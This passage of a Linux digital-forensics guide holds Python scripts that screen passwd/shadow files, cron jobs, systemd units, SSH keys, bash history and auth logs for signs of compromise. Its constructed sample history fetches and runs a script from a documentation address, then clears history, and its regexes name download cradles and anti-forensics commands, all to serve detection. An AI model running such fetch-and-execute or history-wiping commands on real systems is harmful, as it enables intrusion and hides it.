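daemon:*:19000:0:99999:7:::
www-data:$y$j9T$saltsalt$placeholderhash:19737:0:99999:7:::
alice:$1$salt$placeholderhash:19723:0:99999:7:::
bob:!$6$saltsalt$placeholderhash:19000:0:99999:7:::
sysadm:$6$salt$placeholderhash:19737:0:99999:7:::
"""

NOLOGIN_SHELLS = {"/bin/false", "/usr/sbin/nologin", "/sbin/nologin", "/bin/sync"}
TEMP_HOMES = ("/tmp", "/dev/shm", "/var/tmp")
HASH_PREFIXES = {"$6$": "SHA-512", "$5$": "SHA-256", "$y$": "yescrypt",
                 "$2b$": "bcrypt", "$1$": "MD5 (WEAK)"}
EPOCH = date(1970, 1, 1)


def parse_passwd(text):
    """Yield one dict per well-formed passwd line (7 colon-separated fields)."""
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) != 7 or not (parts[2].isdigit() and parts[3].isdigit()):
            continue
        yield {"user": parts[0], "uid": int(parts[2]), "gid": int(parts[3]),
               "home": parts[5], "shell": parts[6]}


def passwd_findings(text):
    """Return (severity, account, reason) tuples for anomalous passwd entries."""
    findings, uid_owners = [], {}
    for acct in parse_passwd(text):
        uid_owners.setdefault(acct["uid"], []).append(acct["user"])
        if acct["uid"] == 0 and acct["user"] != "root":
            findings.append(("ALERT", acct["user"], "UID 0 account other than root"))
        if 0 < acct["uid"] < 1000 and acct["shell"] not in NOLOGIN_SHELLS:
            findings.append(("WARN", acct["user"],
                             "system account with login shell " + acct["shell"]))
        if acct["home"].startswith(TEMP_HOMES) or "/." in acct["home"]:
            findings.append(("WARN", acct["user"],
                             "unusual home directory " + acct["home"]))
    # Two names sharing one UID are the same identity to the kernel.
    for uid, users in uid_owners.items():
        if len(users) > 1:
            findings.append(("WARN", ",".join(users), f"duplicate UID {uid}"))
    return findings


def shadow_status(text):
    """Summarise each shadow entry: hash algorithm, lock state, last change date."""
    rows = []
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) < 3:
            continue
        user, field, last_change = parts[0], parts[1], parts[2]
        locked = field.startswith("!")      # passwd -l / usermod -L prepend '!'
        core = field.lstrip("!")
        if core in ("", "*"):
            status = "no password"
        else:
            algo = next((name for pre, name in HASH_PREFIXES.items()
                         if core.startswith(pre)), "Unknown")
            status = algo + " hash" + (" (locked)" if locked else "")
        # Field 3 is days since 1970-01-01; turn it into a calendar date.
        changed = ((EPOCH + timedelta(days=int(last_change))).isoformat()
                   if last_change.isdigit() else "never")
        rows.append({"user": user, "status": status, "last_change": changed})
    return rows


if __name__ == "__main__":
    for sev, acct, reason in passwd_findings(SAMPLE_PASSWD):
        print(f"{sev}: {acct}: {reason}")
    for row in shadow_status(SAMPLE_SHADOW):
        print(f"{row['user']}: {row['status']}, last changed {row['last_change']}")
```

To run it against the copies collected in Step 1, replace the two sample constants with the contents of `/cases/case-2024-001/linux/config/passwd` and `.../shadow`. The "last changed" date is only as trustworthy as the system clock was at the time; corroborate it with the wtmp/btmp timeline from `last`/`lastb`.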
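Step 3 collects cron entries, systemd unit files and `authorized_keys` into text reports, and the analyst then reads them by eye. The following is an added example (not part of the original skill) of a first automated pass over that material: it extracts the command from system and user crontab entries (system crontabs have an extra user field), pulls the `Exec*` directives out of unit files, flags commands that run from temp or hidden paths, and computes the OpenSSH-style `SHA256:` fingerprint of every key in an `authorized_keys` file so it can be compared against an allowlist of approved fingerprints. The crontabs, unit file and key blobs are constructed for the example; the key blobs are valid base64 but not real keys.

```python
"""Screen cron entries, systemd unit files and authorized_keys for persistence
indicators. Added example, not from the original skill; all inputs are constructed."""
import base64
import binascii
import hashlib
import re

SUSPICIOUS_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")
KEY_TYPES = ("ssh-ed25519", "ssh-rsa", "ssh-dss", "ecdsa-sha2-",
             "sk-ssh-ed25519", "sk-ecdsa-sha2-")
# Exec directives may carry prefix characters (-, @, !, +, :) before the path.
EXEC_LINE = re.compile(r"^\s*(Exec(?:StartPre|StartPost|Start|Stop|Reload))=([-@!+:]*)(.*)$")

SAMPLE_SYSTEM_CRONTAB = """\
SHELL=/bin/sh
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/5 * * * * root /tmp/.x.sh >/dev/null 2>&1
"""
SAMPLE_USER_CRONTAB = """\
@reboot /dev/shm/.agent
0 2 * * * /home/alice/backup.sh
"""
SAMPLE_UNIT = """\
[Unit]
Description=Update checker

[Service]
ExecStart=/lib/.hidden/update-checker
Restart=always

[Install]
WantedBy=multi-user.target
"""
KEY_A = "AAAAC3NzaC1lZDI1NTE5AAAAIA" + "Q" * 42   # constructed blob, not a real key
KEY_B = "AAAAC3NzaC1lZDI1NTE5AAAAIB" + "R" * 42   # constructed blob, not a real key
SAMPLE_AUTHORIZED_KEYS = f"""\
ssh-ed25519 {KEY_A} alice@laptop
command="/tmp/.x.sh",no-pty ssh-ed25519 {KEY_B}
"""


def suspicious_path(token):
    """True for paths under temp dirs or with a hidden ('.'-prefixed) component."""
    tok = token.lstrip("\"'")
    return tok.startswith(SUSPICIOUS_DIRS) or any(
        p.startswith(".") and p not in (".", "..") for p in tok.split("/"))


def cron_command(line, system_tab):
    """Return the command part of a crontab entry, or None for blank, comment
    and VAR= lines. /etc/crontab and /etc/cron.d entries carry a user field
    between the schedule and the command; per-user crontabs do not."""
    s = line.strip()
    if not s or s.startswith("#") or re.match(r"^[A-Za-z_]\w*=", s):
        return None
    skip = (1 if s.startswith("@") else 5) + (1 if system_tab else 0)
    parts = s.split(None, skip)
    return parts[skip] if len(parts) > skip else None


def cron_findings(text, system_tab):
    """(line number, command) for entries whose command touches a suspicious path."""
    out = []
    for n, line in enumerate(text.splitlines(), 1):
        cmd = cron_command(line, system_tab)
        if cmd and any(suspicious_path(t) for t in cmd.split()):
            out.append((n, cmd))
    return out


def systemd_findings(unit_text):
    """Exec* directives whose command references a suspicious path."""
    out = []
    for line in unit_text.splitlines():
        m = EXEC_LINE.match(line)
        if m and any(suspicious_path(t) for t in m.group(3).split()):
            out.append((m.group(1), m.group(3).strip()))
    return out


def parse_authorized_keys(text):
    """Yield one record per key line with its OpenSSH-style SHA256 fingerprint."""
    for n, line in enumerate(text.splitlines(), 1):
        toks = line.split()
        if not toks or toks[0].startswith("#"):
            continue
        idx = next((i for i, t in enumerate(toks) if t.startswith(KEY_TYPES)), None)
        if idx is None or idx + 1 >= len(toks):
            continue
        try:
            digest = hashlib.sha256(base64.b64decode(toks[idx + 1], validate=True)).digest()
        except (binascii.Error, ValueError):
            continue   # malformed blob: not a usable key line
        yield {"line": n, "options": " ".join(toks[:idx]), "type": toks[idx],
               "fingerprint": "SHA256:" + base64.b64encode(digest).decode().rstrip("="),
               "comment": " ".join(toks[idx + 2:])}


def unauthorized_keys(text, known_fingerprints):
    """Keys absent from the approved-fingerprint allowlist, plus any key that
    carries a forced command, which deserves review even when approved."""
    return [k for k in parse_authorized_keys(text)
            if k["fingerprint"] not in known_fingerprints or "command=" in k["options"]]
```

The fingerprint matches what `ssh-keygen -lf authorized_keys` prints, so an allowlist can be built from the organisation's key inventory with the same tool. Forced-command and `no-pty` options are legitimate for automation keys, which is why the example reports them for review rather than treating them as malicious outright.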
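The Step 4 script matches substrings, so entries such as `awk` or `at ` will fire on ordinary commands, and it ignores the `#<epoch>` lines that bash writes before each command when `HISTTIMEFORMAT` is set. The following is an added example (not code from the original skill) that reads those timestamp lines to rebuild a dated timeline, matches indicators only in command position to cut false positives, and reports timestamps that run backwards, which is a sign the file was edited by hand. The history file is constructed; 203.0.113.5 is a documentation address.

```python
"""Reconstruct a dated command timeline from .bash_history and flag suspicious
entries. Added example, not from the original skill; the history is constructed."""
import re
from datetime import datetime, timezone

# With HISTTIMEFORMAT set, bash stores "#<epoch seconds>" on the line before each command.
TS_LINE = re.compile(r"^#\d{9,10}$")
CMD = r"(?:^|[\s;&|(])"   # command position: line start or right after a separator
RULES = [
    ("download-cradle", re.compile(CMD + r"(?:wget|curl)\b.*https?://")),
    ("tmp-path",        re.compile(r"""(?:^|[\s="'])/(?:tmp|dev/shm|var/tmp)/""")),
    ("persistence",     re.compile(CMD + r"(?:crontab|systemctl\s+enable)\b|authorized_keys")),
    ("account-change",  re.compile(CMD + r"(?:useradd|usermod|passwd)\b")),
    ("anti-forensics",  re.compile(CMD + r"(?:history\s+-c|shred|unset\s+HISTFILE)\b")),
]

SAMPLE_HISTORY = """\
#1705312345
ls -la /var/www
#1705312360
wget -q http://203.0.113.5/x.sh -O /tmp/.x.sh
#1705312372
chmod +x /tmp/.x.sh && /tmp/.x.sh
cat /etc/passwd
#1705312400
crontab /tmp/.x.cron
#1705312410
history -c
#1705312000
uptime
"""


def parse_history(text):
    """Return [(timestamp or None, command)]; a command keeps the #epoch line
    immediately preceding it, and None when there was none."""
    entries, pending = [], None
    for line in text.splitlines():
        if TS_LINE.match(line):
            pending = datetime.fromtimestamp(int(line[1:]), tz=timezone.utc)
            continue
        if not line.strip():
            continue
        entries.append((pending, line))
        pending = None
    return entries


def analyze_history(text):
    """Flag commands matching any rule; seq is the 1-based position in the file."""
    findings = []
    for seq, (ts, cmd) in enumerate(parse_history(text), start=1):
        tags = [name for name, rx in RULES if rx.search(cmd)]
        if tags:
            findings.append({"seq": seq, "time": ts.isoformat() if ts else None,
                             "command": cmd, "tags": tags})
    return findings


def timestamp_anomalies(entries):
    """Sequence numbers whose timestamp is earlier than the previous dated entry.
    bash appends in order, so a backwards jump points at manual editing."""
    out, prev = [], None
    for seq, (ts, _cmd) in enumerate(entries, start=1):
        if ts is not None and prev is not None and ts < prev:
            out.append(seq)
        prev = ts or prev
    return out


if __name__ == "__main__":
    entries = parse_history(SAMPLE_HISTORY)
    for f in analyze_history(SAMPLE_HISTORY):
        print(f"{f['seq']:>3} {f['time'] or 'no timestamp':<25} {','.join(f['tags']):<30} {f['command']}")
    print("out-of-order timestamps at:", timestamp_anomalies(entries))
```

Note that `cat /etc/passwd` is not flagged by the `account-change` rule because `passwd` is not in command position; the original substring list would have matched it. Entries without a timestamp can still be ordered relative to their dated neighbours, which is how the undated `cat` line above is placed between 09:52:52 and 09:53:20 UTC.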
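Step 2 collects `wtmp`/`btmp`, and Scenario 1 under Common Scenarios describes the pattern to look for in `auth.log`: a run of failed SSH attempts from one address followed by a success from the same address. The following is an added example (not from the original skill) of that correlation over sshd log lines: it parses `Accepted`/`Failed` events, counts failures per source address, and raises an alert when a success is preceded by at least `threshold` failures from the same address inside `window`. The log lines are constructed (addresses are from the documentation ranges), and the year is passed in explicitly because syslog timestamps omit it.

```python
"""Correlate SSH brute-force attempts with a later successful login from the same
source. Added example, not from the original skill; log lines are constructed and
the year is an assumption supplied by the caller."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

SSHD_AUTH = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2}\s+\d{2}:\d{2}:\d{2})\s+\S+\s+sshd\[\d+\]:\s+"
    r"(?P<result>Accepted|Failed)\s+(?P<method>\w+)\s+for\s+(?:invalid user\s+)?"
    r"(?P<user>\S+)\s+from\s+(?P<ip>[0-9a-fA-F.:]+)\s+port\s+\d+")

SAMPLE_AUTH_LOG = """\
Jan 15 09:50:01 webserver01 sshd[2201]: Failed password for invalid user admin from 203.0.113.5 port 51012 ssh2
Jan 15 09:50:03 webserver01 sshd[2203]: Failed password for root from 203.0.113.5 port 51014 ssh2
Jan 15 09:50:06 webserver01 sshd[2205]: Failed password for invalid user test from 203.0.113.5 port 51016 ssh2
Jan 15 09:50:09 webserver01 sshd[2207]: Failed password for root from 203.0.113.5 port 51018 ssh2
Jan 15 09:50:12 webserver01 sshd[2209]: Failed password for invalid user admin from 203.0.113.5 port 51020 ssh2
Jan 15 09:50:40 webserver01 sshd[2211]: Failed password for alice from 203.0.113.5 port 51022 ssh2
Jan 15 09:51:30 webserver01 sshd[2250]: Accepted password for alice from 203.0.113.5 port 51100 ssh2
Jan 15 09:51:30 webserver01 sshd[2250]: pam_unix(sshd:session): session opened for user alice(uid=1000) by (uid=0)
Jan 15 09:55:02 webserver01 sshd[2260]: Failed password for root from 192.0.2.9 port 40010 ssh2
Jan 15 10:02:11 webserver01 sshd[2301]: Accepted publickey for alice from 198.51.100.7 port 40022 ssh2: ED25519 SHA256:placeholderfingerprint
"""


def parse_auth(lines, year):
    """Yield sshd authentication results as dicts; other log lines are skipped."""
    for line in lines:
        m = SSHD_AUTH.match(line)
        if not m:
            continue
        ev = m.groupdict()
        # Syslog timestamps carry no year, so the caller supplies it.
        ev["time"] = datetime.strptime(f"{year} {ev['ts']}", "%Y %b %d %H:%M:%S")
        yield ev


def failures_by_ip(lines, year=2024):
    """Failed-authentication count per source address."""
    counts = defaultdict(int)
    for ev in parse_auth(lines, year):
        if ev["result"] == "Failed":
            counts[ev["ip"]] += 1
    return dict(counts)


def brute_force_then_success(lines, year=2024, threshold=5, window=timedelta(minutes=30)):
    """One alert per successful login preceded by >= threshold failures from the
    same address within `window`."""
    failures, users_tried, alerts = defaultdict(list), defaultdict(set), []
    for ev in parse_auth(lines, year):
        if ev["result"] == "Failed":
            failures[ev["ip"]].append(ev["time"])
            users_tried[ev["ip"]].add(ev["user"])
            continue
        recent = [t for t in failures[ev["ip"]] if timedelta(0) <= ev["time"] - t <= window]
        if len(recent) >= threshold:
            alerts.append({"ip": ev["ip"], "user": ev["user"], "method": ev["method"],
                           "time": ev["time"].isoformat(), "failures_before": len(recent),
                           "users_tried": sorted(users_tried[ev["ip"]])})
    return alerts


if __name__ == "__main__":
    lines = SAMPLE_AUTH_LOG.splitlines()
    print("failures per source:", failures_by_ip(lines))
    for a in brute_force_then_success(lines):
        print(f"ALERT {a['time']} {a['user']}@{a['ip']} via {a['method']} "
              f"after {a['failures_before']} failures (tried: {', '.join(a['users_tried'])})")
```

Feed it `/var/log/auth.log` (Debian/Ubuntu) or `/var/log/secure` (RHEL) from the image; on journald-only hosts the same sshd lines come out of `journalctl`. The later key-based login from 198.51.100.7 produces no alert on its own, but once an address is implicated, every later session for the same account is in scope for the Step 4 history review.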
## Key Concepts

| Concept | Description |
|---|---|
| /var/log/auth.log | Primary authentication log on Debian/Ubuntu systems |
| /var/log/secure | Primary authentication log on RHEL/CentOS systems |
| wtmp/btmp | Binary logs recording successful and failed login sessions |
| .bash_history | User command history file (can be cleared by attackers) |
| crontab | Scheduled task system commonly used for persistence |
| authorized_keys | SSH public keys granting passwordless access to an account |
| SUID bit | File permission allowing execution as the file owner (privilege escalation vector) |
| LD_PRELOAD | Environment variable that loads a shared library before all others (hooking technique) |

## Tools & Systems

| Tool | Purpose |
|---|---|
| chkrootkit | Rootkit detection scanner for Linux systems |
| rkhunter | Rootkit Hunter - checks for rootkits, backdoors, and local exploits |
| AIDE | Advanced Intrusion Detection Environment - file integrity monitor |
| auditd | Linux audit framework for system call and file access monitoring |
| last/lastb | Parse wtmp/btmp for login and failed login history |
| Plaso/log2timeline | Super-timeline creation including Linux artifacts |
| osquery | SQL-based system querying for live forensic investigation |
| Velociraptor | Endpoint agent with Linux artifact collection capabilities |

## Common Scenarios

**Scenario 1: SSH Brute Force Followed by Compromise** Analyze auth.log for failed SSH attempts followed by success, identify the attacking IP, check .bash_history for post-compromise commands, examine authorized_keys for added backdoor keys, check crontab for persistence, review network connections.

**Scenario 2: Web Server Compromise via Application Vulnerability** Examine web server access and error logs for exploitation attempts, check /tmp and /dev/shm for webshells, analyze the web server user's activity (www-data), check for privilege escalation via SUID binaries or kernel exploits, review outbound connections.

**Scenario 3: Insider Threat on Database Server** Analyze the suspect user's bash_history for database dump commands, check for large tar/zip files in home directory or /tmp, examine scp/rsync commands for data transfer, review cron jobs for automated exfiltration, check USB device logs.

**Scenario 4: Crypto-Miner on Cloud Instance** Check for high-CPU processes in /proc (live) or systemd service files, examine crontab entries for miner restart scripts, check /tmp for mining binaries, analyze network connections for mining pool communications, review authorized_keys for attacker access.

## Output Format

```
Linux Forensics Summary:
  System: webserver01 (Ubuntu 22.04 LTS)
  Hostname: webserver01.corp.local
  Kernel: 5.15.0-91-generic

  User Accounts:
    Total: 25 (3 with UID 0 - 1 ANOMALOUS)
    Interactive shells: 8 users
    Recently created: admin2 (created 2024-01-15)

  Authentication Events:
    Successful SSH logins: 456
    Failed SSH attempts: 12,345 (from 23 unique IPs)
    Sudo executions: 89

  Persistence Mechanisms Found:
    Cron jobs: 3 suspicious (reverse shell, miner restart)
    Systemd services: 1 unknown (update-checker.service)
    SSH keys: 2 unauthorized keys in root authorized_keys
    rc.local: Modified with download cradle

  Suspicious Activity:
    - bash_history contains wget to pastebin URL
    - SUID binary /tmp/.hidden/escalate found
    - /dev/shm/ contains compiled ELF binary
    - LD_PRELOAD in /etc/ld.so.preload pointing to /lib/.hidden.so

  Report: /cases/case-2024-001/linux/analysis/
```

---

- Source: https://github.com/mukul975/anthropic-cybersecurity-skills/blob/HEAD/skills/analyzing-linux-system-artifacts/SKILL.md (repository mukul975/anthropic-cybersecurity-skills, license Apache-2.0)
- Author: @skillopedia, dated 2026-06-05, version v1, category Security / digital-forensics
- Tags: forensics, linux-forensics, system-artifacts, log-analysis, persistence-detection, incident-investigation
- NIST CSF: RS.AN-01, RS.AN-03, DE.AE-02, RS.MA-01
- Bundle attachments: references/api-reference.md, scripts/agent.py
- Description: Examine Linux system artifacts including auth logs, cron jobs, shell history, and system configuration to uncover evidence of compromise or unauthorized activity.